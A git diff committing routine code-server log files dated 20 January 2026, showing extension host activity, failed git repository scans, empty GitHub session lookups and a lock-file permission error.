-0,0 +1,17 @@ +2026-01-20 00:45:22.108 [info] [main] Log level: Info +2026-01-20 00:45:22.108 [info] [main] Validating found git in: "git" +2026-01-20 00:45:22.108 [info] [main] Using git "2.43.0" from "git" +2026-01-20 00:45:22.108 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 00:45:22.108 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:45:22.108 [info] fatal: not a git repository (or any parent up to mount point /) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:45:22.108 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-20 00:45:22.108 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 00:45:22.108 [info] fatal: not a git repository (or any parent up to mount point /) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:45:22.108 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:45:22.108 [info] fatal: not a git repository (or any parent up to mount point /) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:45:23.512 [info] > git rev-parse --show-toplevel [5ms] +2026-01-20 00:45:23.512 [info] fatal: not a git repository (or any parent up to mount point /) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T004510/exthost1/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T004510/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..d7bedb2 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 00:45:21.949 [info] Reading sessions from keychain... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.950 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.950 [info] Got 0 sessions for ... +2026-01-20 00:45:21.974 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.975 [info] Got 0 sessions for ... +2026-01-20 00:45:21.975 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.975 [info] Got 0 sessions for ... +2026-01-20 00:45:21.975 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.975 [info] Got 0 sessions for ... +2026-01-20 00:45:21.975 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.975 [info] Got 0 sessions for ... +2026-01-20 00:45:21.975 [info] Getting sessions for all scopes... +2026-01-20 00:45:21.975 [info] Got 0 sessions for ... +2026-01-20 00:45:23.533 [info] Getting sessions for all scopes... +2026-01-20 00:45:23.533 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T004510/exthost1/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T004510/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..9c73d25 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 00:45:22.110 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T004510/exthost2/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T004510/exthost2/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T004510/exthost2/remoteexthost.log b/code-server-config/data/logs/20260120T004510/exthost2/remoteexthost.log new file mode 100755 index 0000000..8bd115c --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost2/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-20 00:46:01.781 [info] Extension host with pid 1261 started +2026-01-20 00:46:01.795 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Lock acquired. +2026-01-20 00:46:01.887 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 00:46:01.888 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 00:46:02.003 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*' +2026-01-20 00:46:02.054 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 00:46:02.124 [info] Eager extensions activated +2026-01-20 00:46:02.125 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 00:46:02.125 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 00:46:06.546 [info] ExtensionService#_doActivateExtension vscode.git, startup: false, activationEvent: 'api', root cause: vscode.github +2026-01-20 00:49:04.189 [info] Extension host terminating: received terminate message from renderer +2026-01-20 00:49:04.190 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-20 00:49:04.209 [info] Extension host with pid 1261 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T004510/exthost2/vscode.git/Git.log b/code-server-config/data/logs/20260120T004510/exthost2/vscode.git/Git.log new file mode 100755 index 0000000..a21e5a4 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost2/vscode.git/Git.log @@ -0,0 +1,35 @@ +2026-01-20 00:46:06.676 [info] [main] Log level: Info +2026-01-20 00:46:06.676 [info] [main] Validating found git in: "git" +2026-01-20 00:46:06.676 [info] [main] Using git "2.43.0" from "git" +2026-01-20 00:46:06.676 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 00:46:06.676 [info] > git rev-parse --show-toplevel [3ms] +2026-01-20 00:46:06.676 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:46:06.676 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:46:06.676 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:46:06.676 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:46:06.676 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:46:06.681 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:46:06.681 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:46:06.689 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 00:46:06.689 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:46:06.693 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:46:06.693 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:46:06.697 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 00:46:06.697 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:46:06.700 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-20 00:47:13.000 [info] > git rev-parse --show-toplevel [14ms] +2026-01-20 00:47:13.000 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:47:15.905 [info] > git rev-parse --show-toplevel [3ms] +2026-01-20 00:47:15.905 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 00:48:15.019 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 00:48:15.019 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T004510/exthost2/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T004510/exthost2/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..7f254f9 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost2/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 00:46:02.067 [info] Reading sessions from keychain... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.067 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.067 [info] Got 0 sessions for ... +2026-01-20 00:46:02.068 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.069 [info] Got 0 sessions for ... +2026-01-20 00:46:02.069 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.069 [info] Got 0 sessions for ... +2026-01-20 00:46:02.069 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.069 [info] Got 0 sessions for ... +2026-01-20 00:46:02.069 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.069 [info] Got 0 sessions for ... +2026-01-20 00:46:02.069 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.069 [info] Got 0 sessions for ... +2026-01-20 00:46:02.069 [info] Getting sessions for all scopes... +2026-01-20 00:46:02.069 [info] Got 0 sessions for ... +2026-01-20 00:46:03.636 [info] Getting sessions for all scopes... +2026-01-20 00:46:03.636 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T004510/exthost2/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T004510/exthost2/vscode.github/GitHub.log new file mode 100755 index 0000000..4fb4539 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost2/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 00:46:02.180 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T004510/exthost3/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T004510/exthost3/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T004510/exthost3/remoteexthost.log b/code-server-config/data/logs/20260120T004510/exthost3/remoteexthost.log new file mode 100755 index 0000000..056f4b0 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost3/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-20 07:44:25.165 [info] Extension host with pid 35425 started +2026-01-20 07:44:25.171 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': Lock acquired. +2026-01-20 07:44:25.305 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 07:44:25.306 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 07:44:25.571 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*' +2026-01-20 07:44:25.599 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 07:44:25.725 [info] Eager extensions activated +2026-01-20 07:44:25.726 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 07:44:25.726 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 07:44:30.828 [info] ExtensionService#_doActivateExtension vscode.git, startup: false, activationEvent: 'api', root cause: vscode.github +2026-01-20 07:51:23.355 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-20 07:53:00.436 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-20 16:16:28.647 [info] Extension host terminating: received terminate message from renderer +2026-01-20 16:16:28.648 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-20 16:16:28.682 [info] Extension host with pid 35425 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T004510/exthost3/vscode.git/Git.log b/code-server-config/data/logs/20260120T004510/exthost3/vscode.git/Git.log new file mode 100755 index 0000000..9aefb09 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost3/vscode.git/Git.log @@ -0,0 +1,38 @@ +2026-01-20 07:44:30.963 [info] [main] Log level: Info +2026-01-20 07:44:30.963 [info] [main] Validating found git in: "git" +2026-01-20 07:44:30.963 [info] [main] Using git "2.43.0" from "git" +2026-01-20 07:44:30.963 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 07:44:30.963 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 07:44:30.963 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:44:30.963 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 07:44:30.963 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:44:30.964 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 07:44:30.964 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:44:30.968 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 07:44:30.968 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:44:30.974 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 07:44:30.974 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:44:30.978 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 07:44:30.978 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:44:30.981 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 07:44:30.981 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:44:30.984 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-20 07:51:22.556 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 07:51:22.556 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 07:51:23.586 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 07:51:23.586 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 15:31:42.560 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 15:31:42.560 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 15:32:11.859 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 15:32:11.859 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T004510/exthost3/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T004510/exthost3/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..10aa706 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost3/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 07:44:25.688 [info] Reading sessions from keychain... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:25.688 [info] Getting sessions for all scopes... +2026-01-20 07:44:25.688 [info] Got 0 sessions for ... +2026-01-20 07:44:26.608 [info] Getting sessions for all scopes... +2026-01-20 07:44:26.609 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T004510/exthost3/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T004510/exthost3/vscode.github/GitHub.log new file mode 100755 index 0000000..c6ebedc --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost3/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 07:44:25.793 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T004510/exthost4/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T004510/exthost4/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T004510/exthost4/remoteexthost.log b/code-server-config/data/logs/20260120T004510/exthost4/remoteexthost.log new file mode 100755 index 0000000..112cdc1 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost4/remoteexthost.log @@ -0,0 +1,22 @@ +2026-01-20 17:08:04.006 [info] Extension host with pid 129658 started +2026-01-20 17:08:04.020 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Lock acquired. +2026-01-20 17:08:04.134 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 17:08:04.135 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 17:08:04.275 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*' +2026-01-20 17:08:04.293 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 17:08:04.394 [info] Eager extensions activated +2026-01-20 17:08:04.394 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 17:08:04.395 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 17:08:09.400 [info] ExtensionService#_doActivateExtension vscode.git, startup: false, activationEvent: 'api', root cause: vscode.github +2026-01-20 17:13:51.324 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-20 17:13:53.417 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-20 17:23:17.712 [error] Error: EACCES: permission denied, open '/config/data/User/workspaceStorage/-54297bf2/vscode.lock' + at async open (node:internal/fs/promises:641:25) + at async Object.readFile (node:internal/fs/promises:1245:14) + at async gE (file:///app/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:262:6277) + at async file:///app/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:262:5281 +2026-01-20 17:23:17.712 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': The lock was lost unexpectedly. +2026-01-20 17:23:17.713 [error] Error: EACCES: permission denied, utime '/config/data/User/workspaceStorage/-54297bf2/vscode.lock' + at async Object.utimes (node:internal/fs/promises:1135:10) + at async file:///app/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:262:5399 +2026-01-20 17:23:17.713 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Could not update mtime. diff --git a/code-server-config/data/logs/20260120T004510/exthost4/vscode.git/Git.log b/code-server-config/data/logs/20260120T004510/exthost4/vscode.git/Git.log new file mode 100755 index 0000000..281fe04 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost4/vscode.git/Git.log @@ -0,0 +1,32 @@ +2026-01-20 17:08:09.538 [info] [main] Log level: Info +2026-01-20 17:08:09.538 [info] [main] Validating found git in: "git" +2026-01-20 17:08:09.538 [info] [main] Using git "2.43.0" from "git" +2026-01-20 17:08:09.538 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 17:08:09.538 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:08:09.538 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:08:09.538 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:08:09.538 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:08:09.538 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:08:09.538 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:08:09.545 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 17:08:09.545 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:08:09.549 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:08:09.549 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:08:09.553 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:08:09.553 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:08:09.557 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:08:09.557 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:08:09.560 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-20 17:13:50.769 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:13:50.769 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:13:51.559 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:13:51.560 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T004510/exthost4/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T004510/exthost4/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..305f3f3 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost4/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 17:08:04.366 [info] Reading sessions from keychain... +2026-01-20 17:08:04.366 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.366 [info] Got 0 sessions for ... +2026-01-20 17:08:04.366 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.366 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:04.367 [info] Getting sessions for all scopes... +2026-01-20 17:08:04.367 [info] Got 0 sessions for ... +2026-01-20 17:08:05.497 [info] Getting sessions for all scopes... +2026-01-20 17:08:05.497 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T004510/exthost4/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T004510/exthost4/vscode.github/GitHub.log new file mode 100755 index 0000000..8408bd7 --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/exthost4/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 17:08:04.442 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T004510/ptyhost.log b/code-server-config/data/logs/20260120T004510/ptyhost.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T004510/remoteagent.log b/code-server-config/data/logs/20260120T004510/remoteagent.log new file mode 100755 index 0000000..f64947e --- /dev/null +++ b/code-server-config/data/logs/20260120T004510/remoteagent.log @@ -0,0 +1,37 @@ +2026-01-20 00:45:10.090 [info] + + + + +2026-01-20 00:45:10.100 [info] Extension host agent started. +2026-01-20 00:45:10.120 [error] [192.168.100.179][1ef4bc34][ExtensionHostConnection] Unknown reconnection token (never seen). +2026-01-20 00:45:12.692 [error] [192.168.100.179][8052f23f][ManagementConnection] Unknown reconnection token (never seen). +2026-01-20 00:45:20.559 [info] [192.168.100.179][d1b4c654][ManagementConnection] New connection established. +2026-01-20 00:45:21.144 [info] [192.168.100.179][e4545eee][ExtensionHostConnection] New connection established. 